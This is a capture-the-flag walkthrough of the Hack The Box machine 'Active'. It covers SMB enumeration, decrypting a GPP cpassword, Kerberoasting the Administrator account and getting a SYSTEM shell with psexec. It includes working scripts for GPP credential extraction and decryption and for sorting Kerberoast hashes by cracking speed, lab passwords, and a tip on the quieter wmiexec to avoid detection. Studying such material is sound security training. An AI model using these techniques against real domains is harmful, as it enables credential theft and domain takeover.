
HTB Active Writeup

Active is an easy Windows machine that begins with simple SMB enumeration. An anonymously readable share leads us to a Groups.xml file created by a Group Policy Preference (GPP). The file contains a username and a password; the password is AES-256 encrypted, but Microsoft published the key, so we can decrypt it. With the decrypted credentials we can authenticate over SMB and grab the user flag. From there we Kerberoast the domain: we request a service ticket for the Administrator account, which has an SPN set, and crack it offline to recover the Administrator password, giving us a SYSTEM shell on the domain controller.

Enumeration

nmap

┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat full_nmap.nmap   
# Nmap 7.91 scan initiated Fri Sep 10 07:56:37 2021 as: nmap -sC -sV -p- -oA full_nmap 10.129.218.176
Nmap scan report for 10.129.218.176
Host is up (0.024s latency).
Not shown: 65513 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-09-10 11:57:14Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49170/tcp open  msrpc         Microsoft Windows RPC
53715/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-09-10T11:58:08
|_  start_date: 2021-09-10T11:54:44

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 10 07:58:16 2021 -- 1 IP address (1 host up) scanned in 99.23 seconds

The services to note from the full port scan are DNS, Kerberos, RPC, NetBIOS, SMB and LDAP. Kerberos on 88 together with LDAP on 389/3268 tells us this is a domain controller (the reported hostname is DC). LDAP reports the domain as active.htb, which I'll add to /etc/hosts.

Foothold

Begin by looking for low-hanging fruit, meaning CVEs and public exploits for the service versions found. Searching for Microsoft DNS 6.1.7601 didn't yield any good results, and neither did searching for exploits against Windows Server 2008 R2 SP1.

So there is no public exploit, meaning this isn't going to be a one-click box. The next two services I'm going to enumerate for credentials or useful information are RPC and SMB.

rpcclient

Attempting a null session with rpcclient -U "" -N active.htb tests whether anonymous RPC authentication is enabled on this machine. The connection is accepted, but we can't successfully run any commands such as enumdomusers, which would otherwise return the list of domain users.

SMB

Using smbmap we can check which shares are readable anonymously by running smbmap -H active.htb, which gives these results.

        Disk                                                    Permissions
        ----                                                    -----------
        ADMIN$                                                  NO ACCESS
        C$                                                      NO ACCESS
        IPC$                                                    NO ACCESS
        NETLOGON                                                NO ACCESS
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS
        Users                                                   NO ACCESS

The Replication share is the only one readable anonymously, so we can use smbclient to connect to it and look through every directory until we find something interesting.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

		10459647 blocks of size 4096. 5217064 blocks available

After looking in pretty much every directory I came across a Groups.xml file in \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\. The layout mirrors SYSVOL: {31B2F340-016D-11D2-945F-00C04FB984F9} is the well-known GUID of the Default Domain Policy GPO, and MACHINE\Preferences\Groups is where Group Policy Preferences store their Local Users and Groups items. Using smbclient we can connect to the share again and fetch the file onto our local machine with get.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Replication -U ""%""
Try "help" to get a list of possible commands.
smb: \> cd active.htb\
smb: \active.htb\> cd Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

		10459647 blocks of size 4096. 5210051 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (7.9 KiloBytes/sec) (average 7.9 KiloBytes/sec)

User

We've now fetched Groups.xml onto our local machine, so let's take a look at its contents.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>

The most important parts of this file are the username, userName="active.htb\SVC_TGS", and the password, cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ". The cpassword attribute is clearly encrypted rather than a plaintext password, so we can't use these credentials until we find a way to decrypt it.

Searching for Windows cpassword brings up a few articles on cPassword, and one in particular was the biggest help. It also explains what this Groups.xml file is and why it stores credentials. Microsoft introduced Group Policy Preferences (GPP) with Windows Server 2008, and one of its most useful features was the ability to embed credentials in a preference item, for example to create or update a local account on every machine the policy applies to. When such a preference is created, the associated XML file under SYSVOL contains the username and the password; the password is AES-256 encrypted, which in theory should make it impossible to recover without the key. However, Microsoft published the key in the MS-GPPREF specification, so anyone who can read SYSVOL (by default every authenticated domain user, and here even anonymous users via the Replication share) can decrypt every cpassword in the domain. Microsoft removed the ability to save new passwords in GPP with MS14-025 in 2014, but existing XML files that already contain a cpassword were left in place, which is why they still turn up.

Kali Linux, the distro I'm using, already ships a script for this, gpp-decrypt.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
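
As an added example (not from the original post), here is the same decryption done by hand with openssl, plus extraction of the fields from Groups.xml, so the mechanism isn't hidden behind gpp-decrypt. The 32-byte key is the one Microsoft published in MS-GPPREF and the IV is all zeros; the cpassword is base64 with its '=' padding stripped, and the decrypted plaintext is UTF-16LE with PKCS#7 padding. The script assumes openssl and a POSIX awk on PATH, and the Groups.xml it runs on is the file fetched above, embedded inline.

```sh
#!/bin/sh
# Added example, not from the original post: gpp-decrypt re-implemented with
# openssl, plus a small extractor for the userName/cpassword attributes.
# Assumes: openssl and a POSIX awk on PATH.
# The key is the one published by Microsoft in MS-GPPREF; the IV is all zeros.
GPP_AES_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
GPP_AES_IV=00000000000000000000000000000000

# gpp_decrypt CPASSWORD -> prints the plaintext password
#  1. GPP strips the '=' padding from the base64, so restore it first
#  2. base64-decode, then AES-256-CBC decrypt (openssl removes the PKCS#7 padding)
#  3. the plaintext is UTF-16LE; for an ASCII password dropping the NUL bytes suffices
gpp_decrypt() {
    cp="$1"
    case $(( ${#cp} % 4 )) in
        2) cp="${cp}==" ;;
        3) cp="${cp}=" ;;
    esac
    printf '%s' "$cp" | openssl base64 -d -A \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | tr -d '\000'
}

# gpp_extract < Groups.xml -> prints "userName cpassword" for every element that
# carries a non-empty cpassword, whatever order the attributes appear in
gpp_extract() {
    awk '/cpassword="/ {
        u = ""; c = ""
        if (match($0, /userName="[^"]*"/))  u = substr($0, RSTART + 10, RLENGTH - 11)
        if (match($0, /cpassword="[^"]*"/)) c = substr($0, RSTART + 11, RLENGTH - 12)
        if (c != "") print u, c
    }'
}

# gpp_dump < Groups.xml -> "user:password" per entry
gpp_dump() {
    gpp_extract | while read -r user cpass; do
        printf '%s:%s\n' "$user" "$(gpp_decrypt "$cpass")"
    done
}

# The Groups.xml pulled from the Replication share, as shown on this page
GROUPS_XML='<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>'

printf '%s\n' "$GROUPS_XML" | gpp_dump
```

The same cpassword attribute appears in the other GPP files under Preferences (Services.xml, ScheduledTasks.xml, DataSources.xml, Drives.xml, Printers.xml), so it is worth grepping all of SYSVOL for it, not just Groups.xml; some of those files name the account with runAs or accountName instead of userName, so the extractor would need those attributes added to cover them.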

We've now got a set of credentials, SVC_TGS:GPPstillStandingStrong2k18, so let's try connecting to the SMB server with them.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbmap -H 10.129.219.97 -u SVC_TGS -p GPPstillStandingStrong2k18
[+] IP: 10.129.219.97:445	Name: 10.129.219.97                                     
  Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	      Remote Admin
	C$                                                	NO ACCESS	      Default share
	IPC$                                              	NO ACCESS	      Remote IPC
	NETLOGON                                          	READ ONLY	      Logon server share 
	Replication                                       	READ ONLY	
	SYSVOL                                            	READ ONLY	      Logon server share 
	Users                                             	READ ONLY

Compared with the anonymous output we can now also read NETLOGON, SYSVOL and Users. Connecting to the Users share lets us grab user.txt from the SVC_TGS desktop.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Users -U SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

		10459647 blocks of size 4096. 5203621 blocks available
smb: \> cd SVC_TGS\
smb: \SVC_TGS\> ls
  .                                   D        0  Sat Jul 21 11:16:32 2018
  ..                                  D        0  Sat Jul 21 11:16:32 2018
  Contacts                            D        0  Sat Jul 21 11:14:11 2018
  Desktop                             D        0  Sat Jul 21 11:14:42 2018
  Downloads                           D        0  Sat Jul 21 11:14:23 2018
  Favorites                           D        0  Sat Jul 21 11:14:44 2018
  Links                               D        0  Sat Jul 21 11:14:57 2018
  My Documents                        D        0  Sat Jul 21 11:15:03 2018
  My Music                            D        0  Sat Jul 21 11:15:32 2018
  My Pictures                         D        0  Sat Jul 21 11:15:43 2018
  My Videos                           D        0  Sat Jul 21 11:15:53 2018
  Saved Games                         D        0  Sat Jul 21 11:16:12 2018
  Searches                            D        0  Sat Jul 21 11:16:24 2018

		10459647 blocks of size 4096. 5203621 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
  .                                   D        0  Sat Jul 21 11:14:42 2018
  ..                                  D        0  Sat Jul 21 11:14:42 2018
  user.txt                            A       34  Sat Jul 21 11:06:25 2018

		10459647 blocks of size 4096. 5203621 blocks available
smb: \SVC_TGS\Desktop\> get user.txt 
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

Root

We've now got domain credentials, so we need to see what we can do with them. Something I always try is Kerberoasting, since we know this is an Active Directory environment from the Kerberos and LDAP services. Kerberoasting works because any valid domain user can request a Kerberos service ticket (TGS) for any SPN in the domain. The KDC encrypts that ticket with the key of the account that owns the SPN, so if the SPN belongs to a user account (rather than a computer account, whose password is long and random) we can take the ticket offline and brute-force the account's password against it.

We are going to use the impacket script GetUserSPNs.py. It queries LDAP for user accounts that have a servicePrincipalName set and, with -request, asks the KDC for a ticket for each of them and writes the tickets out in a crackable format. It only finds something if at least one user account has an SPN, so let's run it and see what we get back.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request -dc-ip 10.129.219.97 active.htb/SVC_TGS -outputfile hashes.kerberoast
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2021-01-22 03:42:30.615553

The script was successful: the Administrator account has the SPN active/CIFS:445 registered on it. A highly privileged account with an SPN is exactly the misconfiguration Kerberoasting targets, because the ticket we just received is encrypted with a key derived from the Administrator's password. Taking a look at the output file.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ cat hashes.kerberoast 
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d9148716dad09344e8cfceadbbc25de7$...

This is the Kerberoast hash (the encrypted ticket data is truncated above). The $krb5tgs$23$ prefix shows the ticket was issued with etype 23 (RC4-HMAC), whose key is simply the account's NT hash, so it cracks quickly. I'll crack it with john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hashes.kerberoast (hashcat -m 13100 takes the same format); the cracked password is Ticketmaster1968.
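
As an added example (not from the original post), the following triage script reads a GetUserSPNs output file and reports, for each ticket, the account, realm, SPN and encryption type, with the matching cracker mode. The point is the etype: 23 is RC4-HMAC, whose key is the account's NT hash, so it cracks at close to NTLM speed, while 17 and 18 (AES) derive the key with PBKDF2 and are far slower, so you want to know which you have before spending GPU time on a wordlist. It assumes a POSIX awk; the two sample lines are constructed (the first reuses the header shown above with placeholder ciphertext, the second is an invented AES-256 ticket for a made-up svc_sql account).

```sh
#!/bin/sh
# Added example, not from the original post. Parses impacket GetUserSPNs
# output ($krb5tgs$...) and reports what each ticket is and how to crack it.
# Assumes a POSIX awk. The sample ticket data below is constructed.

# Constructed sample: first line reuses the header from this page with
# placeholder ciphertext; second line is an invented AES-256 (etype 18) ticket.
SAMPLE_HASHES='$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d9148716dad09344e8cfceadbbc25de7$0011223344556677
$krb5tgs$18$svc_sql$ACTIVE.HTB$*MSSQLSvc/db.active.htb:1433*$aabbccddeeff00112233aabb$8899aabbccddeeff'

# krb_triage < hashes.kerberoast
# Output, tab-separated: account  realm  spn  etype  cracking-hint
# Header layouts as impacket writes them:
#   etype 23:    $krb5tgs$23$*user$REALM$spn*$checksum$edata
#   etype 17/18: $krb5tgs$18$user$REALM$*spn*$checksum$edata
# The fields sit at the same positions in both; only the '*' markers move.
krb_triage() {
    awk -F'[$]' '
    $2 == "krb5tgs" && NF >= 8 {
        etype = $3
        user = $4;  gsub(/\*/, "", user)
        realm = $5
        spn = $6;   gsub(/\*/, "", spn)
        if (etype == "23")
            hint = "RC4-HMAC, key = NT hash: john --format=krb5tgs or hashcat -m 13100 (fast)"
        else if (etype == "17")
            hint = "AES128-CTS-HMAC-SHA1-96, PBKDF2 key: hashcat -m 19600 (slow)"
        else if (etype == "18")
            hint = "AES256-CTS-HMAC-SHA1-96, PBKDF2 key: hashcat -m 19700 (slow)"
        else
            hint = "unhandled etype"
        printf "%s\t%s\t%s\t%s\t%s\n", user, realm, spn, etype, hint
    }'
}

# krb_fast_targets < hashes.kerberoast -> accounts whose ticket is RC4 (etype 23),
# i.e. the ones worth cracking first
krb_fast_targets() {
    krb_triage | awk -F'\t' '$4 == "23" { print $1 }'
}

printf '%s\n' "$SAMPLE_HASHES" | krb_triage
```

On a real engagement the AES lines are the ones to think twice about: if a hardened domain has disabled RC4 for service accounts, the only cheap option left is a small, targeted wordlist rather than rockyou.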

We've now got another set of credentials, Administrator:Ticketmaster1968, which we can try to use to authenticate via SMB.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ smbclient //10.129.219.97/Users -U Administrator%Ticketmaster1968
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

		10459647 blocks of size 4096. 5203333 blocks available
smb: \> cd Administrator\
smb: \Administrator\> ls
  .                                   D        0  Mon Jul 16 06:14:21 2018
  ..                                  D        0  Mon Jul 16 06:14:21 2018
  AppData                           DHn        0  Mon Jul 16 06:14:15 2018
  Application Data                DHSrn        0  Mon Jul 16 06:14:15 2018
  Contacts                           DR        0  Mon Jul 30 09:50:10 2018
  Cookies                         DHSrn        0  Mon Jul 16 06:14:15 2018
  Desktop                            DR        0  Thu Jan 21 11:49:47 2021
  Documents                          DR        0  Mon Jul 30 09:50:10 2018
  Downloads                          DR        0  Thu Jan 21 11:52:32 2021
  Favorites                          DR        0  Mon Jul 30 09:50:10 2018
  Links                              DR        0  Mon Jul 30 09:50:10 2018
  Local Settings                  DHSrn        0  Mon Jul 16 06:14:15 2018
  Music                              DR        0  Mon Jul 30 09:50:10 2018
  My Documents                    DHSrn        0  Mon Jul 16 06:14:15 2018
  NetHood                         DHSrn        0  Mon Jul 16 06:14:15 2018
  NTUSER.DAT                       AHSn   524288  Fri Jan 22 03:44:25 2021
  ntuser.dat.LOG1                   AHS   262144  Sat Sep 11 11:01:04 2021
  ntuser.dat.LOG2                   AHS        0  Mon Jul 16 06:14:09 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf    AHS    65536  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Jul 16 06:14:15 2018
  ntuser.ini                         HS       20  Mon Jul 16 06:14:15 2018
  Pictures                           DR        0  Mon Jul 30 09:50:10 2018
  PrintHood                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Recent                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Saved Games                        DR        0  Mon Jul 30 09:50:10 2018
  Searches                           DR        0  Mon Jul 30 09:50:10 2018
  SendTo                          DHSrn        0  Mon Jul 16 06:14:15 2018
  Start Menu                      DHSrn        0  Mon Jul 16 06:14:15 2018
  Templates                       DHSrn        0  Mon Jul 16 06:14:15 2018
  Videos                             DR        0  Mon Jul 30 09:50:10 2018

		10459647 blocks of size 4096. 5203333 blocks available
smb: \Administrator\> cd Desktop\
smb: \Administrator\Desktop\> ls
  .                                  DR        0  Thu Jan 21 11:49:47 2021
  ..                                 DR        0  Thu Jan 21 11:49:47 2021
  desktop.ini                       AHS      282  Mon Jul 30 09:50:10 2018
  root.txt                            A       34  Sat Jul 21 11:06:07 2018

		10459647 blocks of size 4096. 5203333 blocks available
smb: \Administrator\Desktop\> get root.txt 
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)

We've now obtained root.txt, but we don't have a shell yet. In theory one could be obtained with crackmapexec by executing a command that fetches netcat and connects back to us, but the whole process is simpler with impacket's psexec.py. Note that psexec.py is noisy: as its output shows, it uploads a randomly named executable to ADMIN$ and creates and starts a service to run it, which leaves a service-installation event behind on the DC. impacket's wmiexec.py runs commands through WMI with the same credentials and no service creation, and is the quieter choice when that matters.

A SYSTEM shell was successfully obtained using psexec.py.

┌──(kali㉿kali)-[~/HTB/Active]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py active.htb/administrator@10.129.219.97
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Requesting shares on 10.129.219.97.....
[*] Found writable share ADMIN$
[*] Uploading file QbXsCvhk.exe
[*] Opening SVCManager on 10.129.219.97.....
[*] Creating service LEgl on 10.129.219.97.....
[*] Starting service LEgl.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

This post is licensed under CC BY 4.0 by the author.